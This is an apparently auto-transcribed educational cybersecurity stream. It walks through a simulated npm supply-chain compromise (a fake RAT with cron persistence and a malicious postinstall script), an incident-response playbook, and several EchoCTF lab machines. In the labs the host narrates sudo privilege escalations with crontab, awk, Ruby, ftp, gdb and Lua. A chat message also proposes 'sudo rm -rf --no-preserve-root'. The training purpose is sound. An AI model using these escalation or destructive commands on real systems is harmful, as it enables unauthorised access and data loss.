grep Python 3. Okay, so PSAUX grep Python 3. So we've got we've got a shell command. Can I copy? Can I copy? Okay, I can copy. Yeah, so it looks something like this. So we got a classic like oh no. Okay, so it's running Python 3 and it's running something called ld.py. So ld.py is probably going to be the script with your malicious code. Okay, so alternatively, you can see top to see the real-time stats. The fake rat is intentionally designed to do a little bit of math in the background, so it occasionally bumps up to the top of the CPU usage list. Note that the absolute path of the script that is running, so the absolute path is temp ld.py. Temp ld.py. Okay. Finding persistence. If Alice reboots her machine, does the attacker lose access? Not if they establish persistence. Attackers frequently use Linux cron jobs to ensure that their malware restarts automatically. Let's check the dev user scheduled tasks. So crontab-l user dev. Okay, let me just copy this so they can type it out. So crontab-l user udev. So we're running the exact Python script as a cron job. So every minute of every day of every hour, we're running that Python script. Okay, how often in minutes does the system attempt to restart the malware? How often every 1 minute? No? Hold on. Oh, is this a 5? Is it 5 minutes? Wouldn't you be able to corrupt the malware script since once you find it, to destroy it and use an antivirus to delete it? I mean, once you find the malware script, you can just delete the malware script. Yeah, I mean, I guess you could modify the instructions in the malware script. I mean, assuming that you've got, like, you know, sufficient access. Okay, file system analysis. So now we know what is running, so temp ld.py, but we need to know how it got there. You know what? Just for fun, let me take a look at the contents of that script. So cat temp ld.py. Oh, okay. So this is just connect to. Okay, so let me copy this. I'll put this in I'll put this in a paste bin so that you can all take a look. Can we create new paste? It might not like code. Verify I'm human. Okay, so if you want to check it out, it's over here. So import socket, import time. So we make an arbitrary connection. So we make like a, what is it called? A networking connection to the malicious server on port 443, and then close. So while true, beacon. Where's the beacon function? Is this the beacon function? This is the beacon function, okay. And it looks like it is... What is it actually sending here? So, I mean, it looks like some sort of list. Okay, obviously you typically want to investigate the thing because malware can be persistent and have multiple backdoors. I mean, you only want to take action once you're sure that you've found everything. Because if you haven't found everything, then there's the possibility that the bad guys make it back onto your system. Okay, but anyways. We know how it got there. We know Alice was working in her application directory. Navigate to our project, home dev my app, node modules. It's not sending anything. So run an LSLA, you will see the plain crypto.js directory. Go inside and read the contents of setup.js and package.json files using the cat command. Okay. let's take a look. cd home dev my app / node modules. Plain crypto.js. So that's a directory, right? Yep. They got package.json. I love it. I love it. Okay. Hold on. Let me see if I can create a paste of this as well. Did I not copy anything? Hold on. Here we are. Okay, and one of the perks of having a hard drive, even a ransomware attack, you can corrupt the hard drive and then reinstall Windows. Okay, so we got plain crypto.js version 4.2.1, description: a totally harmless crypto library. Main index.js scripts, post-installed node, setup.js. Author not a hacker, of course. Okay, and let's take a look at the other file. So the other file is setup.js. Okay, so this is the file that downloads the Python script. Okay, so what does this do? So this is a Node.js file. Constant fs equals require fs. So use the fs library module. Exec equals child process. So child process is executing system commands. Constant cron command, cron tab. Oh, okay. So this inserts the cron job information. User bin python 3 temp ld.py to dev null. Okay, and we execute no hang up user bin python 3 temp ld.py. Where does it download? Where does it download ld.py from? Because I don't see the actual code from ld.py in here. Okay, Snelligoster says, but if you have a ransomware attack, the reason you're going to be a victim is that because your data is at ransom, not your OS. Fair point. Okay, so I think there's not very much left to this lab here. This is not the actual malicious files from the attack. These are simulated files and artifacts. Investigate the plain crypto.js directory. What is the name of the file that writes the cron job and executes the Python payload? What is the name of the file that writes the cron job? That would be setup.js. Whoops. Setup.js. Okay, and then complete and continue. So we got our we have our conclusion. So the incident response: finding the malware is only half the battle. If you discover that a developer's machine has executed a malicious post-install script and dropped a remote access Trojan, your next steps dictate whether this is a minor headache or a company-ending breach. When dealing with a supply chain compromise like Axios plain crypto.js attack, you have to remember that the attacker's primary goal is stealing secrets. Developers have the keys to the kingdom stored locally on their machines: AWS access keys, GitHub SSH keys, NPM publish tokens, and database passwords. If a machine gets hit, you cannot just delete the node modules folder and call it a day. The payload is already executed, and those secrets are already gone. Here are the standard playbooks for responding to a developer endpoint compromise. Hey, Sergeant. Hello, nice to see you here. And, Quoc Viet Nguyen Le. Hello, nice to see you. Sir, I need to learn terminal commands from basic to advanced for Linux. Can you suggest something to me? Yeah, I can. There's a lot of education resources over here. And I think there's a section for Linux there as well. Take a look at those links. And before the package maintainer works together with the US government, and they just use it to infect as many systems as quickly as possible, and only really persist on their political targets. That sounds plausible, but we don't talk too much about politics over here. Okay, step 1 is to isolate the host. Immediately sever the machine's network connection, unplug the Ethernet cable, turn off the Wi-Fi, or isolate the endpoint via your EDR solution. So I mean, if you notice that your machine is doing something really, really bad, disconnect it from the internet immediately, unplug the Ethernet cable. That's what would. I mean, I'm not an expert. That's kind of what my first instinct would be. Okay, do not power off the machine right away. You might need to capture its active memory for forensics, but you must cut off the attacker's command and control connection. Step 2, rotate all secrets. Assume everything on that machine is fully compromised. Thank you very much, Cahoots, for subscribing on YouTube. You must immediately revoke and regenerate every single credential the developer has access to. Cloud providers, deactivate AWS, GCP, and Azure access keys. Source control, revoke GitHub, GitLab SSH keys, and personal access tokens. This is a giant pain in the butt. Registries, invalidate NPM, PyPy, or Docker publish tokens. Internal access, reset VPN credentials and internal passwords. Step 3. burn it all down. Step 3. Hunt for secondary compromise. Did the attacker use the stolen keys before you revoke them? You need to check the logs, review AWS CloudTrail for unusual infrastructure changes, check your GitHub audit logs to ensure that the attacker didn't clone sensitive repositories or push a backdoor into your own company's code base. Step 4. Nuke the machine. Never trust a compromised developer box. Malware is incredibly good at hiding in registries, boot sectors, or even deeply nested system files. Do not try to clean it with an antivirus scan. Image the drive for forensics evidence, wipe it completely, and reinstall the operating system from scratch. So we really did do burn it all down. It is a giant pain if you do not have a good secret refresh protocol to help you. I mean, that's where your oh gosh, what is it called? Disaster something plan? I don't remember what it's called. Jay Stowers, thank you very much for subscribing on YouTube. Okay, so what is the very first step you should take when you discover a machine is communicating with an attacker's C2 server? That is step 1. Isolate the host. Disaster recovery plan. That's what I was trying to think of. Next, SysOS. Okay, true or false, if you delete the malicious node modules folder and run an antivirus scan, the machine is safe to use again. This is false. Step 0, go cry in a corner and think about what you did. Bonus points if you put on a propeller beanie. Okay, because the rat exfiltrates local files, what crucial action must be taken regarding the developer's cloud access keys and GitHub tokens? Revoke access tokens, or regenerate access tokens. What is the rotate all secrets? Did say to use a magnet, of course. What AWS service can you check to see if stolen cloud credentials were used to access your infrastructure? So it was like CloudTrail, right? AWS CloudTrail. Maybe it's just called CloudTrail. Yeah, okay. Okay, conclusion. You've just walked through one of the most difficult challenges facing modern cybersecurity. We spent millions of dollars in firewalls, endpoint detection and response EDR agents, and employee phishing training only for the developer to accidentally install a backdoored package that bypasses all of them from the inside out. The key takeaways. The web is fragile. Modern applications are built on massive towers of open source dependencies. A single compromised package deep in the dependency tree can impact hundreds of millions of users. Scripts are dangerous. The NPM post-install feature is incredibly useful for developers, but it provides attackers with immediate code execution upon installation. Scanners have blind spots. Built-in tools like NPM Audit are essential, but they are not silver bullets. As we saw in the Axios attack, sophisticated malware can wipe its tracks from the package manifests, rendering static analysis tools blind. Visibility is everything. When preventative measures fail, you must rely on fundamental system visibility. Knowing how to hunt for rogue network connections, unusual CPU spikes, and hidden persistence mechanisms is what will ultimately save your network. The open source ecosystem is not going away. It's the engine of the internet. As security professionals, our job isn't to stop developers from using these tools, but to build secure pipelines, enforce strict access controls like 2FA and dependency pinning, and remain vigilant when anonymous behavior occurs on developer endpoints. Take these lessons back to your developer teams. Stay paranoid and hack smarter. That's how hackers will always find and use the weakest link in the security chain to break it. I mean, most of the time, the weakest link in the security chain is a person. Unfortunately, we can't get rid of people. I understand how NPM supply chain attacks work and how to hunt for basic indicators of compromise. Why? Okay, and then I have stopped the machine. So we need to stop the machine. Power off. Okay. And I think we still have about an hour to go, so we might move on to some other activities, because we've got some extra time. Yay, course complete. Thank you very much for subscribing on YouTube, Geraldo. Thank you. Okay, so once again, wow, I've got my own certificate of completion. That's great. So if you want to take a look at this course yourself, here it is over here. Okay, we disconnected. That's good. Okay, so hello, what are we doing? So we just finished our last thing of the day. So I guess we'll cross that off. And what are we doing for the next hour or so? Well, let's do some more. Let's do some more EchoCTF. We're having fun with those escape rooms, so we're gonna do more of them. So EchoCTF Red is over here. The stuff we're gonna be using is free, and we're gonna be doing some stuff from the escape rooms network. So we finished 2 of these machines. There's 8 more of them to go. I don't know if we're gonna be able to get 8 more of them done, but we'll try. Okay, so we did Anvil, we did Cretan, and we're going to be doing Furnace now. So the first thing we need to do is we need to access the platform. I think we already have access. Okay, so let's run the machine. So, So how are your OS escalation skills? See if you can reach the final user, ETS CTF. So each user has... On each user you can successfully escalate. There'll be a flag in its home directory. This flag can be used as a password to directory switch to that user, okay? To start the challenge, connect with this command. So we'll just start up the machine, and then we'll start hacking.
Not every geek with a Commodore 64 can hack into NASA. I mean, these servers have more firewalls than the devil's bedroom. Not every geek with a Commodore 64 can hack into NASA. I mean, these servers have more firewalls than the devil's bedroom.
Not every geek with a Commodore 64 can hack into NASA. Did you know that, guys? Alright, so we started up the machine. Yeah. Okay. So we just need to access it. So if you're signed up to EchoCTF Red, you can access all these machines for free, and they're a very good source of training. I don't need a Commodore 64. I have Opus 4.6, of course. All right, so let's go back in. We got our remote access over here. Whoops. Let's wrap this up in RLWrap. So RLWrap is a nice little utility program that makes primitive shells much more functional than usual. So with RLWrap, you can retrieve previous commands. You can move around inside of your the lines. Usually with a rod like netcat connection, you can't really do that. It's very nice. Okay, so who am I? I am Crucible, and there's some other users here too. There's Cast, Crucible, and Tong, and ETS CTF. It provides read line support. It's I mean, it's a very nice tool, no matter how you slice it. Okay, we've got our first flag in here, ETS CTF, this stuff. So let's copy it and submit it. So we just need to find out how to become the other users. So we got more. Oh, okay. So the user Crucible may run the following commands on Furnace. As the Tong user with no password, we can use user bin crontab. Crontab. I don't think I've used crontab to elevate privileges before, but we can find out. So crontab. Let's see if it's in our favorite website, GTFO bins. Crontab. Okay, so we can inherit, we can command. Okay, it's simulating credential stealing or something, showing the importance of encryption, or does that matter? I'm sorry, I'm not too sure what we're referring to. A lot of companies still use stuff like Windows XP. Windows XP? How are you using AI from automating stuff in cybersecurity? I mean, I'm not really focusing on the AI stuff as far as my cybersecurity stuff is concerned, because I'm mostly about teaching beginner level skills. Is this simulating like credential stealing, or what is showing the importance of encryption, or does that matter? I mean, it's trying to simulate like some sort of sensitive information in the environment variables. I mean, there could be a lot of sensitive stuff in there. Okay, so this executable can run non-interactive system commands. Non-interactive system commands. Okay, so this spawns the default editor to edit the crontab file. Commands can be scheduled to run using the cron syntax. So unprivileged, this, okay, so I mean we can run this as sudo. I mean, not that does it change anything? Crontab E. Okay, if there are environment variables involved, they must be passed via sudo var equals value or exported using sudo E. So this executable can inherit functions from another. So it inherits from vi, thus possibly granting the following functions: shell, file write, file read. So I mean, do we use the same kind of privilege escalations that we use for vi then? So let's try running it. Sudo u tong user bin cron tab. Okay, so are we in Vi right now? Okay, so if we're using Vi, then how's the market right now for cybersecurity? I mean, I heard that it hasn't been great for a while. So this function can be used by an unprivileged user. So shell. So we can just do :shell. No, doesn't look like we got anything here. Can we quit? We can't even quit. Huh. I wonder what happened there. They've announced that GitHub Copilot gets trained on open source code, even private repos. Even private repos. Maybe you need to use the -E option to edit. Oh, you know what? That might be it. That might be it. You're right. Okay. So what was that command? It was a small e or a capital E? Small e. Okay. So we're editing now. Can we break into a shell? We broke into a shell. We broke out into a shell, but for some reason our terminal is unresponsive now. Okay, type that in when you get into the server. Sudo rm rf no preserve root. I mean, I would if I didn't want to use the server, but I do want to use the server. Oh, you know what? Okay, this is... So the shell is running, but for some reason the scrolling on the terminal is all screwed up now. Okay. You could also just make a nice cron tab entry that gives you a callback if you're into that. I mean, what I'm going to do is I'm just going to grab the password for this user, and then I'm going to write it out to the temp directory so that I can read it. Let's see, cat home tong ets CTF, and write it into temp tongpass.txt. Okay, and then we can exit from here. Oh, man, that screwed up my terminal. Command reset. Oh. Okay, so we got the password for the Tong user here. This is also a flag. So I'm gonna submit the flag first, and then we can continue. I want a virus to target NPM packages on my computer and just remove all of them so I can free up disk space. I mean, you don't need a virus to do that. You just need a well-crafted RM command, right? Unless you're talking about Windows. Although you could probably make something with PowerShell that does the same thing. Okay, now we're the Tong user. And so now we have to use the awk command. No worries, no worries. Okay, so if we have access with the awk command as the cast user, I'm pretty sure awk has a well-known privilege escalation on GTFO bins. Yeah. So there's like a shell. It's like a shell method. The executable can spawn an interactive system shell, so awk begin system bin sh. I guess this is all we need to do. Sure. Okay, so I'm running my DNS Pi-hole server right now. Over 1 million domains on the list. That's sounds like a long list. So sudo user cast. We'll do bin bash because bin bash is cooler. Nope. Okay, so I guess we can't do that. So mawk begin. We need to be able to use mawk. I'm not even too sure what mawk is. Mawk is man mawk. Pattern scanning and text processing language. So I mean, we don't have sudo with mawk, so we can't use this method. Why does it say mawk for all of these though? This is an alias of mawk. Oh, really? Mawk is awk. Alright, well I mean that just means we just need to run this. Okay, now we're the new user. That was easy. Okay, so we've successfully changed users twice. And you know what? How about this? We got another flag. Okay, so let's submit this and keep on going. Ooh, that's not that. Copy the flag. Okay, we've got one more flag to go. Did that go through? I can't tell if it went through or not. Okay, I'm going to copy the flag one more time. And I'll try resetting, well, reloading the page. Okay, submit the flag. Alright, I got that flag. Okay, one more. So the last one is... ETS CTF. No exec. No password. Ruby! Hey! Ruby used to be everybody's favorite programming language back in the day. Spoofing sounds like boofing, and I'm kind of game for... I don't know about that. So Ruby. Ruby is used to be a very popular programming language. So let's pull out the Ruby for GTFO bins. I guess we're Ruby. So Ruby with sudo. So Ruby's kind of like it's kind of like a Python situation where we can use Ruby to run system commands. And in this case, we can make it run bin sh or bin bash. Ruby on Rails? When? Oh, when? I mean, it was for a little while. People loved using Ruby, especially the people who make, oh gosh, what is it called? People who, oh gosh, it's Metasploit. Metasploit, script, Ruby. So Metasploit scripts, primarily written in Ruby, allow for an automation of tasks. So, I mean, the people who like Metasploit really like Ruby. Okay, Foreman Puppet. Easily hackable products. Yeah, good old Metasploit. Alright, so we can run Ruby, so we can run this. Ruby exec bin sh, of course we like bin bash better. Sudo user ets CTF. Permission denied. Permission denied? Wait, did we get... Was it... User, maybe we have to specify this. User bin Ruby? Oh, well, we're getting some friction here. E-access. The no exec flag was in sudo? Oh, okay, no exec. So we can't... Okay, so that puts a little hamper on things. So the executable can be used to write data to local files, so we can use... This function is performed by the privileged user if executed via sudo because of the acquired privileges. The acquired privileges are not dropped. So, I mean, we could probably just read the password for the user using Ruby here. Although -e means exec, right? Yeah. So it's gonna... We can't run Ruby -e. Let's just confirm that. No code specified for E? Okay, so maybe it's looking for this keyword right here. You don't need a shell, you can read files with Ruby. So we'll give that a try. Oh no. I disconnected. Darn it. Okay, so what was that? What was that flag? I can't get the flags again, huh? Oh, okay. No exec means spawning off of another child process. So no exec means that the command can't create another process. Okay, let's try doing this real fast. Cron tab. So we use the cron tab to write... Oh, we got the password for this user. We put it in the temp directory. Right. So we can use this to become the Tong user. and then we use the awk command over here. Awk. You know, I learned something today. I learned that that awk is an alias for MAWK, mock. I thought that awk was the actual name of the program. Okay, let's see if we can play some other epic music. Okay, begin system something something. Great. Shell. Okay. What does it stand for? What does this stand for? Mock? Mock is AWK, MAWK. Let's look it up. Linux mock command. Okay, the awk command is a versatile text processing utility. But why does it say here that awk is an alias of mock? If that wasn't the original command. Oh, it's the creator's initials. Linux, why is it named mock? Or why is it named awk? There you go. Okay, AWK, pronounced as the word awk, is an acronym derived from the surnames of its 3 original authors. So Alfred Aho, Peter Weinberger, and Brian Kernighan. Not awkward. It does not stand for awkward, okay. What is Linux mock? Mock is a fast bytecode based interpreter for the awk programming language. That's kind of weird. They had AT&T in the 70s. Yeah, I guess so. Okay, so the last thing we need to do is we need to use Ruby. So we can use Ruby to read a file. So we can do privileged read, file execute. The executable can write data to local files. So something like this. Let's craft it in another terminal. So it'd be sudo user bin ruby, and we're running it as the ETS CTF user. Path to output file f write data. So file open, path to output file, file open. So we file open the user's password. So it's going to be home ETS CTF / ETS CTF. And we need to write the data. I guess we would have to redirect this into something. ETS CTF pass. Something like this. Okay, every awesome invention that led to modern computing basically came from Bell Labs, or AT&T. Have you tried downloading LM Studio and asking about coding? No. Real Joseph Wheeler, is this Temple OS? Is that the meme? The meme is to ask every person if they're using Temple OS? Okay, so it says permission denied. Permission denied home ETS CTF ETS CTF e-access. So it might be, I mean, this might be because the file doesn't exist. Assign it a variable and print it. Avow says, I'm famous. What are you famous for? Leon Lone says, hey everybody, can I ask? I'm a dev, just junior one, and I don't know how to survive in AI. Like current, I code stack Laravel and Vue.js. Everybody, how are you facing this program? How are you facing this problem? And Command Dirt says, awk is the most powerful tool ever. If you know awk, you can basically do anything in Linux. I mean, awk is very, very powerful. I always thought professional hackers only hack knowing everything. Only hack knowing everything. Watching your streams, I realized it's an eternal study. I mean, that's kind of like a fallacy that a lot of people think about hackers, is that hackers know absolutely everything. That's not really the case. So let's open up etc password and see if it can write that, just so that we have something to test. Just read it. Okay, so permission denied. Ruby system open, etc password, e-access. So e-access, I'm assuming that it's like use them in Ruby, execute, file open, etc password in write mode. Am I... Sysopen fails. They don't know everything about cars, they have specialists. I mean, the thing about most hackers is that most hackers are very, very specialized in, like, one specific thing. So, I mean, we can talk about it for just a second. Hackers are mostly specialized. So there are people who only do malware analysis. There are people who only do malware development. There are people who only do network security testing. There are people who only do digital forensics. And the list goes on. Do you have to use Ruby? What are you trying to do, by the way? So we're trying to take advantage of pseudo permissions, because we've got pseudo permissions, but no exec with user bin Ruby. Okay, have you researched eBPF? I mean, I started looking into it, but I'm not too sure how I can incorporate it into something on the live stream. Sudo ruby syscall bin sh syscall. So does that not spawn a process though? I mean, I can give it a try. Sudo u Okay, you could use a eBPF tool. That's about it. Writing an eBPF tool would take a tad too long. You could use an eBPF tool. Permission denied. Permission denied. Syscall permission denied. So I wonder why we're not able to use these commands. Ruby execute syscall, or maybe we can just... Oh, wait. So Ruby, if we use just Ruby by itself, it opens up like an interpreter? Hold on. Sudo user ets CTF Ruby. Print hello. Uh-oh. I guess I'm stuck. Gosh darn it. So if we can't, what can we do with Ruby now? So the executable can read data from local files. So Ruby E, let's just do this. Let's just read from the local file. Thank you very much for subscribing on YouTube, Tarun. Thank you. Okay, we have to go back to the drawing board. This is not created. Can I ask what ethnic race you are? Let's not talk about what race people are. Thank you. What are your thoughts on people spamming coding agents for CTFs? It just ruins the game. Will CTFs slowly decline, do you think? This became like a big problem in PicoCTF. So PicoCTF, let's see. Let me see if I can find anything on the internet about this. PicoCTF coding agent CTF 2026. Because I'm pretty sure that they gave an announcement about how they were disqualifying a bunch of teams for using AI agents. You better be an ethical race. Thank you. Well, I mean, I think I am. I don't know. So what are we doing here? We're becoming the other user. So become the Tong user. Okay. How do you feel about professionals claiming that pen testers learning hacking is no longer necessary thanks to AI? And hacking jobs are finished. That's some BS, Strife. I don't think hacking is finished. I don't think pen testing is finished. I think it's a lot of people. It's a lot of people, you know, being super dramatic, is what it is. Okay, let's go ahead and do the awk thing. So what was the name of the user again? The cast user, okay. Hopefully this is the last time I gotta do this. Write down the flag and then just SU once. Yeah, let me write down the flag. Let's just save this to something on my local system. Learning doesn't end. They're all just lazy junkies pointing out that there is AI there to do everything. I mean, people are way too optimistic about AI replacing everybody's work. Okay, are these streams rewatchable? Yeah, I mean, on YouTube they are. You can also find them on Twitch too. It's just that they're not saved on Twitch forever. I think they've got a shelf life of about a month. Okay, so we just need to find out how to do... We just need to get the system read to work. So the HackerFrogs can read data from local files. So Ruby E, read the darn thing, and then we'll be done. So we're trying to look for home, ETS CTF, ETS CTF, like this. And hopefully we can read the darn thing. Done! Great. So we just need to take this and then become the user. TS CTF. And then we're finished. Great. The noexec apparently hooks specific system calls, so you have to find one that works. So apparently the file read one works, and the puts also works. So we're finished.
What are you?
I'm system root.
I mean, my advice to anybody who's working in the tech industry right now and is really worried about AI stuff is get good at your job. Also, learn how to use the AI. Learn how to use the AI to your advantage in research and in getting stuff done faster. Because I mean, people are going. If you get hired to a new role, they're going to expect that you're able to use the AI to expedite you getting stuff done. Okay, so let me copy that password and then we can submit the last flag and then we're finished. We might be able to do one more machine, or maybe not, we'll see. Such a good teacher. I mean, I try my best. I try my best. If you get some benefit out of it, I'm happy to hear it. Okay, let's try one more of these. So we did anvil, we did cretin, we did furnace, and then we have to do hatchet. Okay, intermediate, non-rootable timed, and we'll start this thing up. Star says, I'd take me a few more hours finding the right syntax and structures through Stack Overflow and other forums and then debug the code. Now I skip to debugging thanks to AI. Don't just vibe code. I mean, the AI does make certain activities like much faster, especially research. Okay, so... Alright, next machine. I'm surprised we were able to fly through these so easily. Although we did run into some problems. Okay, so here we are, footprint at hatchet. Let's get that environment flag right away. And submit it. Okay. Aerofix says, confirm 100%. I am a tech startup founder, by the way. Hey, welcome in. Nice to have you here. Okay, so then the first thing we're going to do is we're going to figure out if we have pseudo permissions. FTP, the garbage user FTP. I mean, we dealt with TFTP previously, but what about the FTP command? Okay, so the filter FTP, we can run a shell with FTP. So this function can be performed by any unprivileged user, FTP bin then bin sh. I mean, all right, if you say so. Okay, so garbage, as the garbage user with no password, user bin FTP. So sudo u garbage user bin FTP, and then we're in FTP, we can start up a shell. Well, that was easy. What is RL wrap before NC? Does it get us a TTY shell? So I mean, it gives you a number of different nice functions. It lets you do command history. It also lets you move inside of the terminal over here, which is something that you can't do using netcat. It's a little more interactive when you use RL wrap. It's very, very nice. Okay, so so we got a new flag, which is this one over here. You know, I'm going to record this just in case we lose access. Let me go and do that. So this is the garbage user. Okay, and let's submit this flag. Did you SSH into this box? They don't let you SSH into these boxes, unfortunately. It'd be a lot easier if you could, but they're making you use a bind shell. Okay, so we've got 2 flags. Now we need to get 2 more. Alexander West, thank you very much for the subscription on YouTube. Thank you. So is this user with the Luna user? Okay. So GDB, so GNU debugger. I'm learning all sorts of new privilege escalation techniques today. So GDB, it's a pretty popular debugging program. But how do you use it for privilege escalation? You can get a shell. So this executable can spawn an interactive system shell, gdb nx ex bin sh ex quit. So are we debugging the bin sh? I don't even know what we're doing at this point. And DDB so pwned. Well, we'll give it a try. So the Luna user, great. Let's construct it over here. Sudo user Luna. GDB nx ex. So ex must be execute. So execute bin sh and then execute quit. So quit out of GDB, but spawn an interactive shell. I think that's what we're supposed to be doing here. Okay, so let's give this a try. Yep, it worked. It's insane that all these shells can get shell without root. It's like Linux. Is Linux insecure or something? I mean, you don't want to give people sudo permissions with any command unless you absolutely have to. And there are so many ways that you can work around different binaries in Linux. hold on. We just got a flag, so I'll go ahead and give this fun emote over here. There you go. So what do we got here? So the ETS CTF user, no exec, no password, Lua. So Lua is another programming language. Okay. So no exec with the Lua programming language. But before we do that, we should probably read this user's password so that we can come back here if we lose access. Okay, Luna. And then we'll submit our flag. Okay, only one flag to go. So yeah, Lua. I don't know very much about Lua. I've heard of the language before, but I'm not too sure when it was popular. Does anybody know about Lua, everybody? Lua. So Lua can get a shell, it can get a reverse shell, file read, file write. I mean, we probably wanted to use a file read, like the previous challenge, because we've got no execute on our command. NeoVim? Oh, NeoVim is coded in Lua? So file read. The executable can read data from local files. Let's grab this. So it's sudo user ets ctf lua e open up home slash ets ctf slash ets ctf. And this will get us our password for the last user. For scripting nvim neovim config, oh, it's Lua. I'm actually learning a lot of new stuff. Let's go over to good old Wikipedia and read about Lua language. Lightweight programming language, Lua. So is this it? Lightweight, high-level, multi-paradigm programming language designed mainly for embedded use in applications. Okay, it's cross-platform software since the interpreter of compiled bytecode is written in ANSI C. Lua has a relatively simple C application programming interface to embed it into applications. Okay, so, well, we've got our command over here. Let's go ahead and run it. I use Lua for my NeoVim configuration. It's a pain to debug. Are we talking about Lua in general, or Lua is typically a mod or additional language, not a main language of any application? Okay. Alright, I guess we're done. Well, let's submit this flag. Wait, is there an extra flag that we missed? What flag are we missing? So we got Luna, we got garbage, we got environment, we got ETS CTF. Am I missing a flag? 3 app, 1 environment. Which flag am I missing? It says I'm only 80% done. Four flags, 3 app, 1 environment. 3 app, 1 environment. I should be done. Why does it not show as complete? Oh, one service. We have to discover a service. Okay. Do I just nmap this thing then? How do I discover the service? Hold on. Okay, nmap this thing. PX to see the service is running? Yeah, maybe. Big shot, hello, nice to see you here. What is up? Alright. Footprint plus, root user, garbage, root Luna. Maybe I need to become that user. So I'll try turning into the Natas CTF user. Maybe it'll give me a flag. Authentication failure. What? Did I not copy it over correctly? That's weird. Because we read that guy's flag. Which is supposed to be his password. Thank you very much for subscribing on YouTube. MRIA. Mysteria? I'm not too sure how to pronounce that. What did you click on when the error happens, or did it just pop up? Okay, so this is... What do you click on when the error happens? So the error, it says authentication failure, but this should be the password for the Natas CTF user. Okay, so managed a headshot, getting started with hatchet, got the last user flag, Luna user flag, garbage user flag. So they get 1, 2, 3, 4 flags, they get started, and then they headshot it. So here, get started, garbage user, Luna user, last user, environment flag. Error message? Which error message are we talking about? So it says authentication failure. So we read this password, it should be the Oh, okay. I see. No worries. So this, I mean, this should be the password. I don't understand. Switch user, Natas CTF. Paste in the password. Doesn't give me access. If you're root, can you change his password? I mean, we don't get root access on this machine. let's exit out of here. Okay, so we got Luna's password. So we'll just become Luna straight out. Whoops, that's not how you do it. Wait, why did this not work? Uh-oh. It looks like it's going to shut down in a bit. I guess I need to restart the machine. Okay. Ruh-roh. So, machine is powered off. Oh, I got the headshot. Why did it not show me getting completing the machine? Alright, well, I guess we're done. I guess... So we can do this. There you go.
What are you?
I'm system root.
It was just the EchoCTF system being a bit weird. Alright, so let's talk about what we're going to be doing next week, because I gotta end the stream in just a bit. So if you're looking for our schedules, we've got our schedules over at the Reddit on our HackerFrogs. Our next week's schedule is going to be pretty similar to this week's schedule. So let's see, on Wednesday, we're going to be playing more puzzle games. We're going to be doing some easy web app demo stuff. We're going to be continuing with our web app course. We're going to be taking a look at some WebSockets over at PortSwigger. So it's web. And then we're going to be doing a CTF box from Vulnix called Shadow Blocks. So this is going to be an extended Linux CTF box challenge. This is the type of challenge where you need to download a virtual machine and deploy it on your network. And that's what we're going to be doing on Wednesday. So on Friday, we're going to go back to doing Advent of Code and doing more Hack the Web. We're going to be doing more web app basics. And yeah, so next time we're going to meet is going to be on Wednesday. But in the meantime, we're going to see if we can raid into some cool people on infosecstreams.com. Infosecstreams.com is a great website for learning about new people who do cybersecurity education, well, cybersecurity live streaming. So on either Twitch or on YouTube, there's a bunch of nice creators over here. None of them are online right now, unfortunately. But you know who is online? Moohoodles. And Moohoodles does stuff about NASA and rockets and all sorts of great sci-fi stuff. Or science stuff, rather. Let me take a look at what she's doing on stream. Nmap scripts are written in Lua too. Oh, okay. Thank you for letting me know about that conundrum. So she usually has a pretty fun stream. She's watching the NASA astronauts. So if you want to watch alongside her, let's start that raid. Okay, everybody, we're going to be back on Wednesday of next week, but I hope everybody has a great weekend, and we're going to be doing more hacking stuff we're going to be doing more hacking stuff on Wednesday. When you arrive on Moohoodle's channel, if you could give this message over here, OSFrog, hip hop hack, OSFrog, I would really appreciate it. Alright, everybody, have a great weekend. We'll be back on Wednesday. HackerFrogs out in 5, 4, 3, 2, 1. See you next time, everybody.